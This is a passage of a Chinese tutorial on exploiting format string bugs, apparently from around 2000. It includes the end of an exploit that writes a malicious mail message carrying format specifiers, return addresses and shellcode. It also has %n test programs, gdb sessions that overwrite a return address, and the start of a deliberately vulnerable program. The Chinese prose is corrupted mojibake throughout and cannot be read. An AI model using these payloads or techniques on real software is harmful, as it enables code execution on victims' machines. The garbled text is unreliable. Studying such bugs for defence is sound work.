聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)*/
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)sscanf(argv[2], "%x", &p);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)if(!ra)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)return;
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)fprintf(stderr,"Bad shellcode\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)exit(0);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)}
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)fprintf(stderr,"return address: 0x%.8x\n", ra);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)fprintf(stderr,"p address: 0x%.8x\n", p);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("From root聽(tīng)聽(tīng)Sun May 28 17:29:37 2000\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("Date: Sun, 28 May 2000 17:29:37 +0800\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("From: %s", "%.500d%.500d%.500d%.398d");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)for(i=0; i < 20; i++)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24); /* 榪炵畫(huà)鐨勮繑鍥炲湴鍧 */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("%c%c%c%c", ( p& 0xff), (p & 0xff00)>>8, (p & 0xff0000)>>16, (p & 0xff000000)>>24);/* 鏈夋晥鐨凱OP *p鎸囬拡 */
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf ("\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf ("Subject: haha\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf ("Message-Id: <200005280929.RAA03577@localhost.localdomain>\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("X-UIDL: ");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)for(i=0; i < sizeof(shellcode);i++)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("%c", shellcode[i]);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf("\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)printf ("\n\n");
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)return 0;
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
<- end ->


2. 闂?shù)簩锛?xì)鏍煎紡鍖栦覆瀵艱嚧瑕嗙洊鍑芥暟榪斿洖鍦板潃

========================================
鎴戜滑鍐嶆潵鐪嬪彟澶栦竴涓棶棰橈細(xì)%n鐨勯棶棰樸?%n鍦ㄦ牸寮忓寲涓殑鎰忔濇槸灝嗘樉紺哄唴瀹圭殑闀垮害杈撳嚭鍒頒竴
涓彉閲忎腑鍘匯傞氬父鐨勭敤娉曟槸榪欐牱鐨勶細(xì)

<- begin ->聽(tīng)聽(tīng)n_test.c

main()
{
聽(tīng)聽(tīng)int num=0x41414141;
聽(tīng)聽(tīng)
聽(tīng)聽(tīng)printf("Before: num = %#x \n", num);
聽(tīng)聽(tīng)printf("%.20d%n\n", num, &num);
聽(tīng)聽(tīng)printf("After: num = %#x \n", num);

}

<- end ->聽(tīng)聽(tīng)

[warning3@redhat-6 format]$ ./n_test
Before: num = 0x41414141
00000000001094795585
After: num = 0x14

鎴戜滑鐪嬪埌錛屽彉閲弉um鐨勫煎凡緇忓彉鎴愪簡(jiǎn)0x14(20),涔熷氨鏄錛屽洜涓烘垜浠殑紼嬪簭涓皢鍙橀噺num鐨勫湴
鍧鍘嬪叆鍫嗘爤錛屼綔涓簆rintf()鐨勭浜屼釜鍙傛暟錛?n浼?xì)灏嗘墦鍗版婚暱搴︿繚瀛樺埌瀵瑰簲鍙傛暟鐨勫湴鍧涓幓銆?br />閭d箞濡傛灉鎴戜滑涓嶅皢num鐨勫湴鍧鍘嬪叆鍫嗘爤浼?xì)鍙戠敓浠涔堜簨鎯呭憿錛?br />

[warning3@redhat-6 format]$ vi n_test.c

<- begin ->聽(tīng)聽(tīng)n_test1.c

main()
{
聽(tīng)聽(tīng)int num=0x41414141;

聽(tīng)聽(tīng)printf("Before: num = %#x \n", num);
聽(tīng)聽(tīng)printf("%.20d%n\n", num);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/* 娉ㄦ剰錛屾垜浠病鏈夊帇num鐨勫湴鍧鍏ユ爤 */
聽(tīng)聽(tīng)printf("After: num = %#x \n", num);

}

<- end ->聽(tīng)聽(tīng)

[warning3@redhat-6 format]$ ./n_test1
Before: num = 0x41414141
Segmentation fault (core dumped)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)<--- 鍦ㄦ墽琛岀浜屼釜printf()鏃跺氨鍙戠敓孌甸敊璇簡(jiǎn)
[warning3@redhat-6 format]$ gdb ./n_test core
GNU gdb 4.18
<...>
#0聽(tīng)聽(tīng)0x4005d897 in _IO_vfprintf (s=0x40104c60, format=0x8048474 "%.20d%n\n",
聽(tīng)聽(tīng)聽(tīng)聽(tīng)ap=0xbffffca8) at vfprintf.c:1212
1212聽(tīng)聽(tīng)聽(tīng)聽(tīng)vfprintf.c: No such file or directory.
(gdb) x/i $pc聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)<--- 鎴戜滑鐪嬬湅涓嬩竴鏉℃寚浠ゆ槸浠涔?
0x4005d897 <_IO_vfprintf+2455>: mov聽(tīng)聽(tīng)聽(tīng)聽(tīng)%eax,(%ecx)聽(tīng)聽(tīng)聽(tīng)<--- 灝?eax鐨勫煎~鍒?ecx涓?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)鐨勫湴鍧鍘?br />(gdb) i r $ecx聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)<--- 鐩殑鍦板潃鏄?0x41414141
ecx聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x41414141聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)1094795585
(gdb) i r $eax
eax聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x14聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)20聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)<--- 濉厖鍐呭鏄?x14(20)
(gdb)

寰堟槑鏄撅紝榪欏氨鏄湪鎵ц%n鎿嶄綔鐨勬椂鍊欏彂鐢熶簡(jiǎn)孌甸敊璇紝0x41414141鑲畾鏄笉鑳借闂殑銆傛垜浠?br />娉ㄦ剰鍒皀um鐨勫垵濮嬪煎氨鏄?x41414141,涓よ呮槸涓嶆槸鏈変粈涔堣仈緋誨憿錛熷叾瀹炰粠鍓嶉潰鍏充簬fmt_test.c
鐨勮璁烘垜浠氨搴旇鍙互鐪嬪嚭鏉ワ紝printf()灝嗗爢鏍堜腑main()鍑芥暟鐨勫彉閲弉um褰撲綔浜?n鎵瀵瑰簲鐨?br />鍙傛暟錛屽洜姝や細(xì)灝?x14淇濆瓨鍒?x41414141涓幓銆傝仾鏄庣殑璇昏呭簲璇ュ彲浠ユ兂鍒幫紝濡傛灉鎴戜滑鍙互鎺у埗
num鐨勫唴瀹癸紝閭d箞涓嶅氨鎰忓懗鐫鍙互淇敼浠繪剰鍦板潃錛堝綋鐒舵槸鍏佽鍐欏叆鐨勫湴鍧)鐨勫唴瀹逛簡(jiǎn)錛熸槸鐨勩?br />鎴戜滑棣栧厛鎯沖埌鐨勬槸瑕嗙洊鍑芥暟鐨勮繑鍥炲湴鍧錛岃鎴戜滑淇敼涓涓嬬▼搴忥細(xì)

<- begin ->聽(tīng)聽(tīng)n_test2.c

main()
{
聽(tīng)聽(tīng)int num=0xbffffcbc;

聽(tīng)聽(tīng)printf("Press Any Key to Continue...\n");
聽(tīng)聽(tīng)getchar();
聽(tīng)聽(tīng)printf("Before: num = %#x \n", num);
聽(tīng)聽(tīng)printf("%.1094795585u%n\n", num);聽(tīng)聽(tīng)/* 1094795585 = 0x41414141 */
聽(tīng)聽(tīng)printf("After: num = %#x \n", num);

}

<- end ->聽(tīng)聽(tīng)


榪欓噷鐨刵um鐨勫兼槸main()鍑芥暟鐨勮繑鍥炲湴鍧錛屾垜浠殑鐩殑鏄皢0x41414141瑕嗙洊main()鍑芥暟
鐨勮繑鍥炲湴鍧錛岃繖鏍蜂粠main()鍑芥暟榪斿洖鏃跺氨浼?xì)锜╁?x41414141鍘昏繍琛岋紝褰撶劧榪欎細(xì)瀵艱嚧孌甸敊
璇紝榪欓噷鍙槸涓句釜渚嬪瓙鑰屽凡銆?br />鑷充簬getchar()鐨勪綔鐢紝綰補(bǔ)鏄負(fù)浜?jiǎn)璋冭瘯鏂逛究锛屼竴浼?xì)浣牉兗?xì)鏄庣櫧涓轟粈涔堣鍔犺繖涓笢瑗褲?br />緇嗗績(jī)鐨勮鑰呭彲鑳戒細(xì)鍙戠幇鎴戝皢%d鎹㈡垚浜?u,榪欐槸鍥犱負(fù)濡傛灉瑕?br />鎵撳嵃鐨勫間負(fù)璐熸暟錛宲rintf浼?xì)鑷姩鍦ㄥ墠闈㈠姞涓婁竴涓?-'鍙鳳紝榪欐牱瀹為檯鐨勬墦鍗扮粨鏋滈暱搴﹀氨瑕?br />鍔犱笂涓錛屽湪榪欎釜渚嬪瓙涓紝鎴戜滑灝卞彲鑳借煩鍒?x41414142鍘諱簡(jiǎn)錛屽綋鐒惰繖閲屽鎴戜滑騫舵病鏈変粈涔?br />褰卞搷錛屽鏋滄垜浠湁寰堝%d,渚嬪錛?%d%d%d...%d%d",鎴戜滑灝變笉鑳界畝鍗曠殑鏍規(guī)嵁"%d"鐨勪釜鏁版潵
璁$畻鏄劇ず緇撴灉鐨勯暱搴︼紝榪樿鑰冭檻鍙兘鐨?-'鍙鋒暟鐩備負(fù)浜?jiǎn)绠渚胯搗瑙侊紝鎴戜滑鐢?u鏉ユ樉紺猴紝瀹?br />浼?xì)鎸夋棤绗﹀忎h暣鏁版潵鏄劇ず緇撴灉錛屽氨涓嶇敤鑰冭檻'-'鍙風(fēng)殑鎯呭喌銆?br />
璁╂垜浠潵鐪嬬湅榪愯緇撴灉錛岃繖鏄湪涓鍙癛edHat 6.1涓嬭繍琛岀殑緇撴灉錛?br />[warning3@redhat-6 format]$ gcc -o n2 -g n_test2.c
[warning3@redhat-6 format]$ ./n2
Press Any Key to Continue...

榪欐椂鎴戜滑鍐嶅紑涓涓粓绔痆tty2]鏉ヨ皟璇曪細(xì)
<鍦ㄧ粓绔痶ty2涓?gt;

[warning3@redhat-6 format]$ gdb ./n2 `ps -auxw|grep './n2'|grep -v grep|awk '{print $2}'`
GNU gdb 4.18
<......>
Attaching to program: /home/warning3/format/./n2, Pid 28428
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
0x400bcdb4 in __libc_read () from /lib/libc.so.6
(gdb) bt
#0聽(tīng)聽(tīng)0x400bcdb4 in __libc_read () from /lib/libc.so.6
#1聽(tīng)聽(tīng)0x4010648c in __DTOR_END__ () from /lib/libc.so.6
#2聽(tīng)聽(tīng)0x4006c7a1 in _IO_new_file_underflow (fp=0x40104ba0) at fileops.c:385
#3聽(tīng)聽(tīng)0x4006e6f1 in _IO_default_uflow (fp=0x40104ba0) at genops.c:371
#4聽(tīng)聽(tīng)0x4006db5c in __uflow (fp=0x40104ba0) at genops.c:328
#5聽(tīng)聽(tīng)0x4006af56 in getchar () at getchar.c:37
#6聽(tīng)聽(tīng)0x8048417 in main () at n_test2.c:6
(gdb) i f 6
Stack frame at 0xbffffcb8:
eip = 0x8048417 in main (n_test2.c:6); saved eip 0x400301eb
caller of frame at 0xbffffcac
source language c.
Arglist at 0xbffffcb8, args:
Locals at 0xbffffcb8, Previous frame's sp is 0x0
Saved registers:
聽(tīng)聽(tīng)ebp at 0xbffffcb8, eip at 0xbffffcbc聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)---> 榪欐槸main鍑芥暟淇濆瓨榪斿洖鍦板潃鐨勫湴鏂癸紝
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)涔熸槸num鍒濆鍊?
(gdb) c聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)---> 璁╄窡韙殑紼嬪簭緇х畫(huà)榪愯聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
Continuing.

鐜板湪鎴戜滑鍐嶅垏鎹㈠埌鍘熷厛鐨勭粓绔笂錛岀戶緇墽琛屾垜浠殑紼嬪簭錛?br />[warning3@redhat-6 format]$ ./n2
Press Any Key to Continue...聽(tīng)聽(tīng)---> 鎸変竴涓嬪洖杞?

Before: num = 0xbffffcbc

鎴戜滑鍐嶅垏鍒皌ty2鏉ョ湅鍙戠敓浜?jiǎn)浠涔堬細(xì)
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.聽(tīng)聽(tīng)---> 鍙戠敓浜?jiǎn)娈佃畨K棶閿欒
0x4005dff0 in _IO_vfprintf (s=0x40104c60,
聽(tīng)聽(tīng)聽(tīng)聽(tīng)format=0x80484d2 "%.1094795585u%n\n", ap=0xbffffcb4) at vfprintf.c:1259
1259聽(tīng)聽(tīng)聽(tīng)聽(tīng)vfprintf.c: No such file or directory.

(gdb) x/6i $pc聽(tīng)聽(tīng)---> 鐪嬬湅鎴戜滑瑕佹墽琛屼粈涔堝懡浠や簡(jiǎn)
0x4005dff0 <_IO_vfprintf+4336>: movb聽(tīng)聽(tīng)聽(tīng)$0x30,(%esi)
0x4005dff3 <_IO_vfprintf+4339>: dec聽(tīng)聽(tīng)聽(tīng)聽(tīng)%esi
0x4005dff4 <_IO_vfprintf+4340>: mov聽(tīng)聽(tīng)聽(tīng)聽(tīng)0xfffffad8(%ebp),%eax
0x4005dffa <_IO_vfprintf+4346>: decl聽(tīng)聽(tīng)聽(tīng)0xfffffad8(%ebp)
0x4005e000 <_IO_vfprintf+4352>: test聽(tīng)聽(tīng)聽(tīng)%eax,%eax
0x4005e002 <_IO_vfprintf+4354>: jg聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x4005dff0 <_IO_vfprintf+4336>

(gdb) i r $esi
esi聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0xbfffdfff聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)-1073750017
(gdb) i r $eax
eax聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x41412b43聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)1094789955聽(tīng)聽(tīng)----> 榪樻湁0x41412b43涓?0'瑕佸~鍏?br />(gdb) x/200x $esi
0xbfffdfff:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303000聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe00f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe01f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe02f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe03f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe04f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe05f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe06f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe07f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
0xbfffe08f:聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)0x30303030
<....>

鎴戜滑鐪嬪埌榪欏嚑鍙ョ▼搴忓皢0x30('0')寰鍫嗘爤欏剁(浣庡湴鍧鏂瑰悜)涓~鍏咃紝瀹為檯涓婂氨鏄負(fù)鏄劇ず
"%.1094795585u"涓寚瀹氱殑'0'鍋氬噯澶囥傚ソ鍍忓爢鏍堝お灝忎簡(jiǎn)錛屼笉瓚充互瀛樻斁榪欎箞澶?0',璁╂垜浠?br />鍐嶆潵鐪嬬湅./n2鎵ц鏃剁殑鍐呭瓨鏄犲皠錛?br />
^Z
[1]+聽(tīng)聽(tīng)Stopped聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)gdb ./n2 `ps -auxw|grep './n2'|grep -v grep|awk '{print $2}'`
[warning3@redhat-6 format]$ cat /proc/28428/maps
08048000-08049000 r-xp 00000000 03:06 168475聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/home/warning3/format/n2
08049000-0804a000 rw-p 00000000 03:06 168475聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/home/warning3/format/n2
40000000-40012000 r-xp 00000000 03:06 144892聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/lib/ld-2.1.2.so
40012000-40013000 rw-p 00012000 03:06 144892聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/lib/ld-2.1.2.so
40013000-40015000 rw-p 00000000 00:00 0
40018000-40103000 r-xp 00000000 03:06 144899聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/lib/libc-2.1.2.so
40103000-40107000 rw-p 000ea000 03:06 144899聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)/lib/libc-2.1.2.so
40107000-4010b000 rw-p 00000000 00:00 0
bfffe000-c0000000 rwxp fffff000 00:00 0

浠庝笂闈㈡垜浠彲浠ョ湅鍒板彲鍐欑殑鍫嗘爤孌墊槸浠巄fffe000-c0000000涔嬮棿鐨勫湴鍧絀洪棿錛岃屽墠闈㈢殑璇彞
瑕佸皢0x30('0')鍐欏叆0xbfffdfff,榪欎釜鍦板潃宸茬粡涓嶅湪鍫嗘爤孌典腑錛屽洜姝や細(xì)鍙戠敓孌佃闂敊璇傜▼
搴忎篃灝辨墽琛屼笉涓嬪幓浜?jiǎn)銆傚洜姝わ紝鍦≧edHat 6.1涓紝鎴戜滑涓嶈兘綆鍗曠殑鐩存帴鐢?.RET%n鐨勬柟寮忔潵瑕?br />鐩栧嚱鏁拌繑鍥炲湴鍧錛屽洜涓洪氬父RET閮芥槸鍦ㄥ爢鏍堟涓紝鍗抽氬父澶т簬0xbfff0000,榪欐槸涓浉褰撳ぇ鐨勬暟
鍊鹼紝RedHat 6.1鐨刧libc涓殑vfprintf()涓嶈兘姝e父鏄劇ず榪欎箞澶氱殑'0',鑰孯edHat 6.2涓殑glibc
鎵甯︾殑vfprintf()鍒欏彲浠ワ紝涔熷氨鏄錛屼笂闈㈢殑紼嬪簭鍦≧edHat 6.2涓?榪欐潯璇彞錛?br />printf("%.1094795585u%n\n", num);
鍙互姝e父緇撴潫錛岀劧鍚巑ain()鐨勮繑鍥炲湴鍧琚鐩栨垚0x41414141銆?br />浣嗘槸鎴戝茍涓嶅緩璁鑰呯洿鎺ュ湪RedHat 6.2涓嬭繍琛岃繖涓▼搴忥紝鍥犱負(fù)瀹冧細(xì)鎵撳嵃闈炲父澶氱殑0,浣犻渶瑕?br />鏈夎凍澶熺殑鑰愬績(jī)鎵嶈兘絳夊緟瀹冪粨鏉? :-)

<1> 鏀誨嚮鏂規(guī)硶涓錛氱洿鎺ヨ鐩栬繑鍥炲湴鍧
=================================

鎴戜滑鐪嬪彟澶栦竴涓畝鍗曠殑闂紼嬪簭錛屾垜浠細(xì)鍏堝湪RedHat 6.2涓婅繘琛屾敾鍑?yán)L祴璇曪細(xì)


<- begin ->聽(tīng)聽(tīng)vul.c

/*聽(tīng)聽(tīng)A simple vulnerable example for format bug.
*聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)warning3@nsfocus.com
*/

錛僫 nclude <stdarg.h>
錛僫 nclude <unistd.h>
錛僫 nclude <syslog.h>

#define BUFSIZE 1024

int log(int level, char *fmt,...)
{
聽(tīng)聽(tīng)聽(tīng)char buf[BUFSIZE];
聽(tīng)聽(tīng)聽(tīng)va_list ap;
聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)va_start(ap, fmt);
聽(tīng)聽(tīng)聽(tīng)vsnprintf(buf, sizeof(buf)-1, fmt, ap);
聽(tīng)聽(tīng)聽(tīng)buf[BUFSIZE-1] = '\0';
聽(tīng)聽(tīng)聽(tīng)syslog(level, "[hmm]: %s", buf);
聽(tīng)聽(tīng)聽(tīng)va_end(ap);
}


int main(int argc, char **argv)
{

聽(tīng)聽(tīng)char buf[BUFSIZE];
聽(tīng)聽(tīng)int num,i;
聽(tīng)聽(tīng)
聽(tīng)聽(tīng)num = argc ;

聽(tīng)聽(tīng)if(argc > 1) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)for ( i = 1 ; i < num ; i ++ ) {
